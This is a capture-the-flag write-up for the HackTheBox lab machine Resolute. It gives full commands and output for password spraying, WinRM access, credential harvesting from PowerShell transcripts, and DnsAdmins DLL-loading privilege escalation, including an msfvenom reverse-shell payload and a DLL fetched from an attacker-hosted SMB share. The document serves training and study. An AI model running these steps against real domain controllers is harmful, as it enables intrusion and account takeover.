Post

HackTheBox Resolute

Writeup for HackTheBox Resolute

HackTheBox Resolute

Machine Synopsis

Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM. (Source)

Key exploitation techniques:

  • Active Directory anonymous LDAP bind for information disclosure
  • Password spray for valid credentials
  • WinRM for initial user access
  • PowerShell transcript log analysis for credential discovery
  • Lateral movement
  • DnsAdmins group abuse for arbitrary DLL loading and RCE

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
❯ nmap -p- --min-rate 10000 10.10.10.169

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49713/tcp open  unknown
63433/tcp open  unknown

❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49713,63433 -sC -sV 10.10.10.169

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 01:49:47Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49680/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open   msrpc        Microsoft Windows RPC
49688/tcp open   msrpc        Microsoft Windows RPC
49713/tcp open   msrpc        Microsoft Windows RPC
63433/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

The scan identified a Windows Domain Controller (RESOLUTE) running Active Directory services. megabank.local was added to /etc/hosts.

1
echo -e '10.10.10.169\tmegabank.local' | sudo tee -a /etc/hosts

rpcclient was used with a null session to enumerate domain users, revealing a list of potential usernames.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...
user:[marko] rid:[0x457]
...

rpcclient $> queryuser marko
    User Name   :   marko
    Full Name   :   Marko Novak
    ...
    Description :   Account created. Password set to Welcome123!
    ...

The queryuser marko command revealed a password hint in the description: Welcome123!. Although marko’s account was no longer using this password, it was a strong candidate for password spraying.

All enumerated users were saved to users.txt. kerbrute was used to validate these users.

1
2
3
4
5
6
7
8
❯ kerbrute -domain megabank.local -users users.txt -dc-ip 10.10.10.169
...
[*] Valid user => Administrator
...
[*] Valid user => ryan
...
[*] Valid user => melanie
...

impacket-GetNPUsers was used to check for users with UF_DONT_REQUIRE_PREAUTH set, but none were found.

Exploitation

Password Spray & Initial Access (melanie)

A password spray was performed using nxc with the discovered password Welcome123! against the list of valid users.

1
2
3
4
❯ nxc smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
...
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!

The password Welcome123! was valid for melanie. evil-winrm was used to gain a shell as melanie.

1
2
3
4
❯ evil-winrm -i 10.10.10.169 -P 5985 -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
1c3161947f44efe99fc0caf2175edcf5

The user.txt flag was retrieved.

Privilege Escalation

PowerShell Transcript Log & Lateral Movement (ryan)

Enumeration of users in C:\Users\ revealed ryan.

1
2
3
4
5
*Evil-WinRM* PS C:\Users\melanie\Desktop> cd C:\Users
*Evil-WinRM* PS C:\Users> ls
...
d-----        9/27/2019   7:05 AM                ryan
...

A hidden directory PSTranscripts was found in C:\ using dir -force. This directory contained PowerShell transcript logs.

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> dir -force
...
d--h--        12/3/2019   6:32 AM                PSTranscripts
...
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file was downloaded and reviewed. It contained a command with plaintext credentials.

1
2
3
4
5
cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
...

The password for ryan was Serv3r4Admin4cc123!. Lateral movement to ryan was achieved via evil-winrm.

1
❯ evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'

On ryan’s desktop, note.txt indicated a 1-minute auto-revert for system changes (excluding administrator account changes).

1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

whoami /groups revealed ryan was a member of the DnsAdmins group.

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------
...
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...

DnsAdmins Group Abuse (SYSTEM)

Membership in the DnsAdmins group allows an attacker to load an arbitrary DLL into the DNS Server service, which runs as NT AUTHORITY\SYSTEM. This is a common privilege escalation vector.

A malicious DLL payload was generated using msfvenom to reset the Administrator password.

1
❯ msfvenom -p windows/x64/exec cmd='net user administrator P@ssw0rd /domain' -f dll > hehe.dll

(Alternatively, for a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=443 -f dll -o rev.dll)

An SMB server was set up on the attacking machine to host the malicious DLL.

1
❯ impacket-smbserver share ./

From the ryan shell, the DNS settings were modified using dnscmd to load the malicious DLL upon service restart.

1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.16.4\share\hehe.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

The DNS service was then manually stopped and started to trigger DLL loading.

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
...
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
...

The Administrator password was successfully reset to P@ssw0rd. Final login as Administrator via evil-winrm confirmed full system compromise.

1
2
3
4
❯ evil-winrm -i 10.10.10.169 -P 5985 -u administrator -p 'P@ssw0rd'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
60d344a054c92723949cf2b4c775449c
This post is licensed under CC BY 4.0 by the author.